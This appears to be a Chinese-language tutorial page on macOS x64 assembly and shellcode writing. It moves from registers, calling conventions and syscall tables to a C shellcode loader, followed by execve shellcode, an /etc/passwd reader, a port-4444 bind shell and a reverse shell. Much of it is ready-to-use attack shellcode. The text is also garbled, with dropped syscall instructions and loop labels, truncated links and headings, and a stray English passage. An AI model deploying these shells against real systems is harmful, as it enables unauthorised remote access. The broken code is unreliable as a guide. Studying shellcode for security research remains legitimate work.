
16 KiB
Raw Blame History


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  1. rax - 传统上用于函数的返回值
  2. rbx - 经常用作内存操作的基址寄存器
  3. rcx - 常用于循环计数器
  4. rdx - 用于各种角色,包括扩展算术运算。
  5. rbp - 栈帧的基指针
  6. rsp - 栈指针,跟踪栈的顶部。
  7. rsirdi - 用于字符串/内存操作中的目的索引。
  8. r8r15 - 在x64中引入的额外通用寄存器。



  • Windows:前四个参数通过寄存器**rcxrdxr8r9传递。更多的参数被推送到栈上。返回值在rax**中。
  • System V通常用于类UNIX系统:前六个整数或指针参数通过寄存器**rdirsirdxrcxr8r9传递。返回值也在rax**中。




  • mov:将一个值从一个寄存器内存位置移动到另一个寄存器或内存位置。
  • 示例:mov rax, rbx — 将rbx中的值移动到rax中。
  • pushpop:将值推送到/从中弹出。
  • 示例:push rax — 将rax中的值推送到栈中。
  • 示例:pop rax — 将栈顶的值弹出到rax中。
  • addsub加法减法操作。
  • 示例:add rax, rcx — 将raxrcx中的值相加,并将结果存储在rax中。
  • muldiv乘法除法操作。注意:这些操作对操作数的使用有特定的行为。
  • callret:用于调用从函数返回
  • int:用于触发软件中断。例如在32位x86 Linux中int 0x80用于系统调用。
  • cmp比较两个值并根据结果设置CPU的标志位。
  • 示例:cmp rax, rdx — 将raxrdx进行比较。
  • jejnejljge...条件跳转指令,根据先前的cmp或测试结果改变控制流。
  • 示例:在cmp rax, rdx指令之后,je label — 如果rax等于rdx,则跳转到label
  • syscall在某些x64系统如现代Unix中用于系统调用
  • sysenter:在某些平台上优化的系统调用指令。


  1. 保存旧的基指针: push rbp(保存调用者的基指针)
  2. 将当前栈指针移动到基指针: mov rbp, rsp(为当前函数设置新的基指针)
  3. 在栈上为局部变量分配空间: sub rsp, <size>(其中 <size> 是所需的字节数)


  1. 将当前基指针移动到栈指针: mov rsp, rbp(释放局部变量)
  2. 从栈中弹出旧的基指针: pop rbp(恢复调用者的基指针)
  3. 返回: ret(将控制权返回给调用者)




#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */
#define SYSCALL_CLASS_IPC	5	/* Mach IPC */


0	AUE_NULL	ALL	{ int nosys(void); }   { indirect syscall }
1	AUE_EXIT	ALL	{ void exit(int rval); }
2	AUE_FORK	ALL	{ int fork(void); }
3	AUE_NULL	ALL	{ user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }
4	AUE_NULL	ALL	{ user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }
5	AUE_OPEN_RWTC	ALL	{ int open(user_addr_t path, int flags, int mode); }
6	AUE_CLOSE	ALL	{ int close(int fd); }
7	AUE_WAIT4	ALL	{ int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); }
8	AUE_NULL	ALL	{ int nosys(void); }   { old creat }
9	AUE_LINK	ALL	{ int link(user_addr_t path, user_addr_t link); }
10	AUE_UNLINK	ALL	{ int unlink(user_addr_t path); }
11	AUE_NULL	ALL	{ int nosys(void); }   { old execv }
12	AUE_CHDIR	ALL	{ int chdir(user_addr_t path); }





{% code overflow="wrap" %}

nasm -f macho64 shell.asm -o shell.o
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib

{% endcode %}


{% code overflow="wrap" %}

# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
for c in $(objdump -d "shell.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c

# Another option
otool -t shell.o | grep 00 | cut -f2 -d$'\t' | sed 's/ /\\x/g' | sed 's/^/\\x/g' | sed 's/\\x$//g'

{% endcode %}

用于测试shellcode的C代码 ```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader #include #include <sys/mman.h> #include #include

int (*sc)();

char shellcode[] = "";

int main(int argc, char **argv) { printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));

void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);

if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } printf("[+] SUCCESS: mmap\n"); printf(" |-> Return = %p\n", ptr);

void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); printf("[+] SUCCESS: memcpy\n"); printf(" |-> Return = %p\n", dst);

int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);

if (status == -1) { perror("mprotect"); exit(-1); } printf("[+] SUCCESS: mprotect\n"); printf(" |-> Return = %d\n", status);

printf("[>] Trying to execute shellcode...\n");

sc = ptr; sc();

return 0; }


#### Shell


{% tabs %}
{% tab title="使用adr" %}
bits 64
global _main
call    r_cmd64
db '/bin/zsh', 0
r_cmd64:                      ; the call placed a pointer to db (argv[2])
pop     rdi               ; arg1 from the stack placed by the call to l_cmd64
xor     rdx, rdx          ; store null arg3
push    59                ; put 59 on the stack (execve syscall)
pop     rax               ; pop it to RAX
bts     rax, 25           ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)

{% tab title="使用堆栈" %}

bits 64
global _main

xor     rdx, rdx          ; zero our RDX
push    rdx               ; push NULL string terminator
mov     rbx, '/bin/zsh'   ; move the path into RBX
push    rbx               ; push the path, to the stack
mov     rdi, rsp          ; store the stack pointer in RDI (arg1)
push    59                ; put 59 on the stack (execve syscall)
pop     rax               ; pop it to RAX
bts     rax, 25           ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)

{% endtab %} {% endtabs %}


目标是执行execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)因此第二个参数x1是一个参数数组在内存中表示为地址的堆栈

bits 64
section .text
global _main

; Prepare the arguments for the execve syscall
sub rsp, 40         ; Allocate space on the stack similar to `sub sp, sp, #48`

lea rdi, [rel cat_path]   ; rdi will hold the address of "/bin/cat"
lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd"

; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"]
push rsi   ; Add "/etc/passwd" to the stack (arg0)
push rdi   ; Add "/bin/cat" to the stack (arg1)

; Set in the 2nd argument of exec the addr of the array
mov rsi, rsp    ; argv=rsp - store RSP's value in RSI

xor rdx, rdx    ; Clear rdx to hold NULL (no environment variables)

push    59      ; put 59 on the stack (execve syscall)
pop     rax     ; pop it to RAX
bts     rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall         ; Make the syscall

section .data
cat_path:      db "/bin/cat", 0
passwd_path:   db "/etc/passwd", 0


To invoke a command using the sh command, you can use the following syntax:


sh -c "command"

For example, if you want to execute the ls command using sh, you would run:


sh -c "ls"

This will execute the ls command as if it were run directly from the command line.

bits 64
section .text
global _main

; Prepare the arguments for the execve syscall
sub rsp, 32           ; Create space on the stack

; Argument array
lea rdi, [rel touch_command]
push rdi                      ; push &"touch /tmp/lalala"
lea rdi, [rel sh_c_option]
push rdi                      ; push &"-c"
lea rdi, [rel sh_path]
push rdi                      ; push &"/bin/sh"

; execve syscall
mov rsi, rsp                  ; rsi = pointer to argument array
xor rdx, rdx                  ; rdx = NULL (no env variables)
push    59                    ; put 59 on the stack (execve syscall)
pop     rax                   ; pop it to RAX
bts     rax, 25               ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)

xor rdi, rdi                  ; Exit status code 0
push    1                     ; put 1 on the stack (exit syscall)
pop     rax                   ; pop it to RAX
bts     rax, 25               ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)

section .data
sh_path:        db "/bin/sh", 0
sh_c_option:    db "-c", 0
touch_command:  db "touch /tmp/lalala", 0

绑定 shell

https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html 获取的绑定 shell端口 4444上。

section .text
global _main
xor  rdi, rdi
mul  rdi
mov  dil, 0x2
xor  rsi, rsi
mov  sil, 0x1
mov  al, 0x2
ror  rax, 0x28
mov  r8, rax
mov  al, 0x61

; struct sockaddr_in {
;         __uint8_t       sin_len;
;         sa_family_t     sin_family;
;         in_port_t       sin_port;
;         struct  in_addr sin_addr;
;         char            sin_zero[8];
; };
mov  rsi, 0xffffffffa3eefdf0
neg  rsi
push rsi
push rsp
pop  rsi

; bind(host_sockid, &sockaddr, 16)
mov  rdi, rax
xor  dl, 0x10
mov  rax, r8
mov  al, 0x68

; listen(host_sockid, 2)
xor  rsi, rsi
mov  sil, 0x2
mov  rax, r8
mov  al, 0x6a

; accept(host_sockid, 0, 0)
xor  rsi, rsi
xor  rdx, rdx
mov  rax, r8
mov  al, 0x1e

mov rdi, rax
mov sil, 0x3

; dup2(client_sockid, 2)
;   -> dup2(client_sockid, 1)
;   -> dup2(client_sockid, 0)
mov  rax, r8
mov  al, 0x5a
sub  sil, 1
test rsi, rsi
jne  dup2

; execve("//bin/sh", 0, 0)
push rsi
mov  rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop  rdi
mov  rax, r8
mov  al, 0x3b

反向 Shell

https://packetstormsecurity.com/files/151727/macOS-获取反向 Shell。反向 Shell 到

section .text
global _main
xor  rdi, rdi
mul  rdi
mov  dil, 0x2
xor  rsi, rsi
mov  sil, 0x1
mov  al, 0x2
ror  rax, 0x28
mov  r8, rax
mov  al, 0x61

; struct sockaddr_in {
;         __uint8_t       sin_len;
;         sa_family_t     sin_family;
;         in_port_t       sin_port;
;         struct  in_addr sin_addr;
;         char            sin_zero[8];
; };
mov  rsi, 0xfeffff80a3eefdf0
neg  rsi
push rsi
push rsp
pop  rsi

; connect(sockid, &sockaddr, 16)
mov  rdi, rax
xor  dl, 0x10
mov  rax, r8
mov  al, 0x62

xor rsi, rsi
mov sil, 0x3

; dup2(sockid, 2)
;   -> dup2(sockid, 1)
;   -> dup2(sockid, 0)
mov  rax, r8
mov  al, 0x5a
sub  sil, 1
test rsi, rsi
jne  dup2

; execve("//bin/sh", 0, 0)
push rsi
mov  rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop  rdi
xor  rdx, rdx
mov  rax, r8
mov  al, 0x3b
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